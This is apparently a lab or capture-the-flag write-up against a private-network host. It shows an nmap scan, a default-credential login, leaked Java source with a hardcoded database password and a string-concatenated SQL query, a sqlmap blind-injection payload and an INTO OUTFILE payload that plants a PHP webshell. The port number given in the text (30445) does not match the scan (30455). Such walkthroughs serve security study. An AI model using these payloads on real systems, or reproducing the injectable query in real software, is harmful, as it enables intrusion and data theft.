$ nmap -p- --min-rate 3000 -Pn 192.168.157.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 12:15 +08
Warning: 192.168.157.147 giving up on port because retransmission cap hit (10).
Stats: 0:03:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 85.65% done; ETC: 12:19 (0:00:35 remaining)
Nmap scan report for 192.168.157.147
Host is up (0.17s latency).
Not shown: 65481 filtered tcp ports (no-response), 50 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
We can log in with admin:admin. There, we see an issuetracker.zip file:
We can download this to our Kali machine and unzip it, which reveals the source code of a website:
$ ll
total 32
-rw-r--r-- 1 kali kali 1495 Feb 2 2021 HELP.md
-rwxr-xr-x 1 kali kali 10070 Feb 2 2021 mvnw
-rw-r--r-- 1 kali kali 6608 Feb 2 2021 mvnw.cmd
-rw-rw-r-- 1 kali kali 2248 Feb 5 2021 pom.xml
drwxr-xr-x 4 kali kali 4096 Feb 2 2021 src
Source Code Analysis -> SQLI RCE
The source code is Java, for the application running on port 17445. Looking through the files, I found this in src/main/java/com/issue/tracker/issues/IssueController.java:
@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
    // // Custom code, need to integrate to the JPA
    //
    Properties connectionProps = new Properties();
    connectionProps.put("user", "issue_user");
    connectionProps.put("password", "ManagementInsideOld797");
    try {
        conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker", connectionProps);
        // user input is concatenated straight into the SQL text
        String query = "SELECT message FROM issue WHERE priority='" + priority + "'";
        System.out.println(query);
        Statement stmt = conn.createStatement();
        stmt.executeQuery(query);
        // ... (rest of the handler omitted)
This snippet gave us database credentials, and it is also vulnerable to SQL injection, since the priority parameter is concatenated into the query without any sanitisation. I registered a user on the machine and then tested the SQL injection using sqlmap:
$ sqlmap -r req
---
Parameter: priority (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: priority=' AND (SELECT 3165 FROM (SELECT(SLEEP(5)))JlSD) AND 'aCou'='aCou
---
Normally, it should be rather easy to write a webshell using a payload like this:
' union select '<?php system($_REQUEST['cmd']); ?>' into outfile '/srv/http/cmd.php' -- -
However, I didn't know the document root, and sqlmap's brute force didn't seem to work. I took a hint and realised that port 30445 was supposed to host phpinfo.php, but it was unresponsive.
I read the walkthrough, which shows that /srv/http is the document root (taken from phpinfo.php); that would allow me to write a webshell served on port 30445.